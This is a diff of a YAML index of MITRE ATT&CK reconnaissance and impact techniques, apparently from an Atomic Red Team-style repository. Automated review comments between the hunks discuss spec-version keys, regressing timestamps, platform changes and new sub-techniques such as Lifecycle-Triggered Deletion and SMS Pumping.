url: https://github.com/dxa4481/truffleHog
+ - source_name: Bleeping Computer Stealer Logs 2023
+ description: 'Flare. (2023, June 6). Dissecting the Dark Web Supply Chain:
+ Stealer Logs in Context. Retrieved October 10, 2024.'
+ url: https://www.bleepingcomputer.com/news/security/dissecting-the-dark-web-supply-chain-stealer-logs-in-context/
- source_name: Register Uber
description: McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub
into court to find who hacked database of 50,000 drivers. Retrieved October
@@ -56117,6 +56801,10 @@ reconnaissance:
Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved
October 19, 2020.
url: https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196
+ - source_name: SecureWorks Infostealers 2023
+ description: SecureWorks Counter Threat Unit Research Team. (2023, May 16).
+ The Growing Threat from Infostealers. Retrieved October 10, 2024.
+ url: https://www.secureworks.com/research/the-growing-threat-from-infostealers
- source_name: Register Deloitte
description: 'Thomson, I. (2017, September 26). Deloitte is a sitting duck:
Key systems with RDP open, VPN and proxy ''login details leaked''. Retrieved
@@ -56124,9 +56812,8 @@ reconnaissance:
url: https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.003:
technique:
@@ -56185,7 +56872,7 @@ reconnaissance:
adversaries may leverage [Data from Cloud Storage](https://attack.mitre.org/techniques/T1530)
to access valuable information that can be exfiltrated or used to escalate
privileges and move laterally. "
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-15T19:10:23.838Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Wordlist Scanning
x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
@@ -56205,7 +56892,6 @@ reconnaissance:
- 'Network Traffic: Network Traffic Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1591.004:
technique:
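Review bot: T1595.003 drops `spec_version` but keeps `x_mitre_attack_spec_version: 2.1.0` (the unchanged context line above the removal), whereas most techniques in this change are bumped to 3.2.0; together with the `modified` value moving back to `2022-04-15` in the previous hunk this reads as an object upstream has not touched since spec 2.1. Fine to merge as generated, but after this patch the file mixes 2.1.0, 3.0.0 and 3.2.0 objects, so nothing downstream should assume a single ATT&CK spec version per file.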
@@ -56227,7 +56913,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:39:08.904Z'
name: Identify Roles
description: |-
Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.
@@ -56243,12 +56929,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598:
technique:
- modified: '2023-09-08T20:28:49.600Z'
+ modified: '2024-05-31T04:18:44.570Z'
name: Phishing for Information
description: "Adversaries may send phishing messages to elicit sensitive information
that can be used during targeting. Phishing for information is an attempt
@@ -56317,7 +57001,7 @@ reconnaissance:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: Avertium callback phishing
description: Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK
PHISHING. Retrieved February 2, 2023.
@@ -56365,31 +57049,12 @@ reconnaissance:
url: https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.001:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
- type: attack-pattern
- created: '2020-10-02T16:54:23.193Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1595.001
- url: https://attack.mitre.org/techniques/T1595/001
- - source_name: Botnet Scan
- url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
- description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
- a Botnet. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T13:46:55.039Z'
name: Scanning IP Blocks
description: |-
Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.
@@ -56398,19 +57063,41 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Diego Sappa, Securonix
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
+ created: '2020-10-02T16:54:23.193Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1595/001
+ external_id: T1595.001
+ - source_name: Botnet Scan
+ description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
+ a Botnet. Retrieved October 20, 2020.
+ url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1590.001:
technique:
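Review bot: this hunk changes the shape of the entry as well as its values: `spec_version: '2.1'` is dropped and `x_mitre_attack_spec_version` moves from `2.1.0` to `3.2.0`, alongside the content updates (`x_mitre_version` 1.0 to 1.1, a new `x_mitre_contributors` list, `x_mitre_platforms: [PRE]`, the added `Network Traffic: Network Traffic Content` data source). The PR description should name the ATT&CK release the index was regenerated from, and any tooling that reads `spec_version` from these entries needs to tolerate the key being absent.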
@@ -56468,7 +57155,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596.005:
technique:
@@ -56489,7 +57175,7 @@ reconnaissance:
- source_name: Shodan
url: https://shodan.io
description: Shodan. (n.d.). Shodan. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:49:49.260Z'
name: Scan Databases
description: |-
Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)
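Review bot: `modified` for T1596.005 moves backwards here, from `2022-04-25T14:00:00.188Z` to `2021-04-15T03:49:49.260Z`, and the same regression appears for T1591.001, T1598.001, T1491.002, T1499.001 and T1561 further down; in every case the old value carries the shared `14:00:00.188Z` time component. That pattern suggests the previous index was built from a bulk-restamped dataset rather than from per-object edit times. Confirm the new source is the intended ATT&CK release and not an older snapshot, because a regressing `modified` would otherwise read as a downgrade to anyone diffing the data.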
@@ -56505,8 +57191,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.001:
technique:
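Review bot: T1596.005 loses both `spec_version` and `x_mitre_attack_spec_version` with nothing replacing them, so the entry ends up with no spec marker at all, while T1590.001 in the hunk above keeps `x_mitre_attack_spec_version: 2.1.0` and the techniques with content updates in this patch are rewritten with `3.2.0`. Three states for the same field in one regeneration indicates the generator copies whatever the upstream object has; if anything consumes this field, either normalise it in the generator or document that it is optional.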
@@ -56532,7 +57216,7 @@ reconnaissance:
url: https://www.sec.gov/edgar/search-and-access
description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-27T15:37:09.025Z'
name: Determine Physical Locations
description: |-
Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.
@@ -56548,8 +57232,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.1'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598.001:
technique:
@@ -56573,7 +57255,7 @@ reconnaissance:
url: https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/
description: 'O''Donnell, L. (2020, October 20). Facebook: A Top Launching
Pad For Phishing Attacks. Retrieved October 20, 2020.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:43:12.843Z'
name: Spearphishing Service
description: |-
Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -56595,13 +57277,11 @@ reconnaissance:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
impact:
T1561.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:32:05.064Z'
name: Disk Structure Wipe
description: "Adversaries may corrupt or wipe the disk data structures on a
hard drive necessary to boot a system; targeting specific critical systems
@@ -56693,13 +57373,12 @@ impact:
url: https://www.symantec.com/connect/blogs/shamoon-attacks
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1498.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:54:49.943Z'
name: Direct Network Flood
description: |-
Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.
@@ -56708,7 +57387,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_deprecated: false
x_mitre_detection: 'Detection of a network flood can sometimes be achieved before
the traffic volume is sufficient to cause impact to the availability of the
@@ -56725,17 +57403,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Sensor Health: Host Status'
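Review bot: the platform list for T1498.001 drops `Azure AD`, `Office 365`, `SaaS` and `Google Workspace`, leaving Windows, IaaS, Linux and macOS, and the version bump 1.3 to 1.4 is consistent with that being an upstream revision; T1499.003 and T1499.004 receive the same four-platform list later in the patch. Any per-platform index derived from this file has to be regenerated in the same change so these techniques stop appearing under the removed platforms. The hunk also deletes `x_mitre_modified_by_ref`, which the next hunk adds back, another instance of the key reordering rather than a real change.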
@@ -56760,7 +57433,8 @@ impact:
url: https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1491.002:
technique:
@@ -56798,7 +57472,7 @@ impact:
description: 'Marco Balduzzi, Ryan Flores, Lion Gu, Federico Maggi, Vincenzo
Ciancaglini, Roel Reyes, Akira Urano. (n.d.). A Deep Dive into Defacement:
How Geopolitical Events Trigger Web Attacks. Retrieved April 19, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-25T19:34:37.539Z'
name: External Defacement
description: 'An adversary may deface systems external to an organization in
an attempt to deliver messaging, intimidate, or otherwise mislead an organization
@@ -56832,12 +57506,10 @@ impact:
- 'Network Traffic: Network Traffic Content'
x_mitre_impact_type:
- Integrity
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1499.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:51.289Z'
name: OS Exhaustion Flood
description: |-
Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.
@@ -56902,42 +57574,127 @@ impact:
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
- T1499.003:
+ T1485.001:
technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
+ modified: '2024-10-16T21:27:02.481Z'
+ name: Lifecycle-Triggered Deletion
+ description: "Adversaries may modify the lifecycle policies of a cloud storage
+ bucket to destroy all objects stored within. \n\nCloud storage buckets often
+ allow users to set lifecycle policies to automate the migration, archival,
+ or deletion of objects after a set period of time.(Citation: AWS Storage Lifecycles)(Citation:
+ GCP Storage Lifecycles)(Citation: Azure Storage Lifecycles) If a threat actor
+ has sufficient permissions to modify these policies, they may be able to delete
+ all objects at once. \n\nFor example, in AWS environments, an adversary with
+ the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle`
+ API call to apply a lifecycle policy to an S3 bucket that deletes all objects
+ in the bucket after one day.(Citation: Palo Alto Cloud Ransomware) In addition
+ to destroying data for purposes of extortion and [Financial Theft](https://attack.mitre.org/techniques/T1657),
+ adversaries may also perform this action on buckets storing cloud logs for
+ [Indicator Removal](https://attack.mitre.org/techniques/T1070).(Citation:
+ Datadog S3 Lifecycle CloudTrail Logs)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Storage: Cloud Storage Modification'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--1001e0d6-ee09-4dfc-aa90-e9320ffc8fe4
+ created: '2024-09-25T13:16:14.166Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1485/001
+ external_id: T1485.001
+ - source_name: AWS Storage Lifecycles
+ description: AWS. (n.d.). Managing the lifecycle of objects. Retrieved September
+ 25, 2024.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-lifecycle-mgmt.html
+ - source_name: GCP Storage Lifecycles
+ description: Google Cloud. (n.d.). Object Lifecycle Management. Retrieved
+ September 25, 2024.
+ url: https://cloud.google.com/storage/docs/lifecycle
+ - source_name: Azure Storage Lifecycles
+ description: Microsoft Azure. (2024, July 3). Configure a lifecycle management
+ policy. Retrieved September 25, 2024.
+ url: https://learn.microsoft.com/en-us/azure/storage/blobs/lifecycle-management-policy-configure?tabs=azure-portal
+ - source_name: Palo Alto Cloud Ransomware
+ description: 'Ofir Balassiano and Ofir Shaty. (2023, November 29). Ransomware
+ in the Cloud: Breaking Down the Attack Vectors. Retrieved September 25,
+ 2024.'
+ url: https://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/
+ - source_name: Datadog S3 Lifecycle CloudTrail Logs
+ description: Stratus Red Team. (n.d.). CloudTrail Logs Impairment Through
+ S3 Lifecycle Rule. Retrieved September 25, 2024.
+ url: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1496.003:
+ technique:
+ modified: '2024-10-16T17:45:14.210Z'
+ name: SMS Pumping
+ description: |-
+ Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability.(Citation: Twilio SMS Pumping) SMS pumping is a type of telecommunications fraud whereby a threat actor first obtains a set of phone numbers from a telecommunications provider, then leverages a victim’s messaging infrastructure to send large amounts of SMS messages to numbers in that set. By generating SMS traffic to their phone number set, a threat actor may earn payments from the telecommunications provider.(Citation: Twilio SMS Pumping Fraud)
+
+ Threat actors often use publicly available web forms, such as one-time password (OTP) or account verification fields, in order to generate SMS traffic. These fields may leverage services such as Twilio, AWS SNS, and Amazon Cognito in the background.(Citation: Twilio SMS Pumping)(Citation: AWS RE:Inforce Threat Detection 2024) In response to the large quantity of requests, SMS costs may increase and communication channels may become overwhelmed.(Citation: Twilio SMS Pumping)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Application Log: Application Log Content'
+ x_mitre_impact_type:
+ - Availability
type: attack-pattern
- created: '2020-02-20T15:35:00.025Z'
+ id: attack-pattern--130d4494-b2d6-4040-bcea-6e59f05222fe
+ created: '2024-09-25T13:53:19.586Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1499.003
- url: https://attack.mitre.org/techniques/T1499/003
- - source_name: Arbor AnnualDoSreport Jan 2018
- url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
- description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
- Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
- into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
- Infrastructure Security Report. Retrieved April 22, 2019.
- - source_name: Cisco DoSdetectNetflow
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1496/003
+ external_id: T1496.003
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+ - source_name: Twilio SMS Pumping
+ description: Twilio. (2024, April 10). What Is SMS Pumping Fraud and How to
+ Stop It. Retrieved September 25, 2024.
+ url: https://www.twilio.com/en-us/blog/sms-pumping-fraud-solutions
+ - source_name: Twilio SMS Pumping Fraud
+ description: Twilio. (n.d.). What is SMS Pumping Fraud?. Retrieved September
+ 25, 2024.
+ url: https://www.twilio.com/docs/glossary/what-is-sms-pumping-fraud
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1499.003:
+ technique:
+ modified: '2024-10-15T15:41:49.168Z'
name: Application Exhaustion Flood
description: 'Adversaries may target resource intensive features of applications
to cause a denial of service (DoS), denying availability to those applications.
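Review bot: two new sub-techniques enter the file here, T1485.001 (Lifecycle-Triggered Deletion) and T1496.003 (SMS Pumping), both created 2024-09-25, and both with `x_mitre_detection: ''` and `atomic_tests: []`. Two things to check: first, the empty-string detection differs from the block scalars every other entry uses, so code that formats detection guidance must handle `''`; second, because the entries are spliced between T1499.001 and T1499.003 instead of appended, the diff shows T1499.003's old platform and reference lines as deleted and interleaves its data with the new entries, which a stable ordering by technique ID would avoid. For defenders reading the new entries, the listed data sources are the useful part: `Cloud Storage: Cloud Storage Modification` is where a lifecycle-policy change on a bucket (the T1485.001 description names the `PutBucketLifecycle` call) would surface, and `Application Log: Application Log Content` is where abnormal request rates against OTP or verification endpoints would show for T1496.003.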
@@ -56948,13 +57705,20 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: |-
Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
@@ -56962,12 +57726,33 @@ impact:
- 'Application Log: Application Log Content'
x_mitre_impact_type:
- Availability
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+ created: '2020-02-20T15:35:00.025Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1499/003
+ external_id: T1499.003
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+ - source_name: Arbor AnnualDoSreport Jan 2018
+ description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
+ Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
+ into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
+ Infrastructure Security Report. Retrieved April 22, 2019.
+ url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1561:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-20T18:16:41.942Z'
name: Disk Wipe
description: |-
Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.
@@ -57028,109 +57813,79 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1565.001:
technique:
+ modified: '2024-08-26T16:33:33.982Z'
+ name: Stored Data Manipulation
+ description: |-
+ Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
+
+ Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: Where applicable, inspect important file hashes, locations,
+ and modifications for suspicious/unexpected values.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'File: File Modification'
+ - 'File: File Creation'
+ - 'File: File Deletion'
+ x_mitre_impact_type:
+ - Integrity
type: attack-pattern
id: attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292
created: '2020-03-02T14:22:24.410Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1565.001
url: https://attack.mitre.org/techniques/T1565/001
+ external_id: T1565.001
- source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
description: Department of Justice. (2018, September 6). Criminal Complaint
- United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+ url: https://www.justice.gov/opa/press-release/file/1092091/download
- source_name: FireEye APT38 Oct 2018
- url: https://content.fireeye.com/apt/rpt-apt38
description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
November 6, 2018.'
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
-
